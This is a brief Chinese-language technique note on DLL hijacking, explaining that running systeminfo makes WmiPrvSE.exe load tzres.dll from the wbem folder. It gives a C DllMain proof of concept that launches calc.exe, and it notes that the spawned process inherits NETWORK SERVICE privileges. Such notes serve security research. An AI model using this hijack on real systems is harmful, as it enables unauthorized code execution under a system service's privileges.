systeminfo、WmiPreSE.exe，dll劫持

在执行systeminfo命令时，systeminfo.exe内部通过wmi和LPC的方式获取数据，WmiPrvse.exe在执行实际操作时会去加载tzres.dll

dll路径：C:\Windows\System32\wbem\tzres.dll

#include 
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc.exe");
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

由于WmiPrvSE.exe是NETWORK SERVICE权限，所以被创建的子进程都继承了这个权限。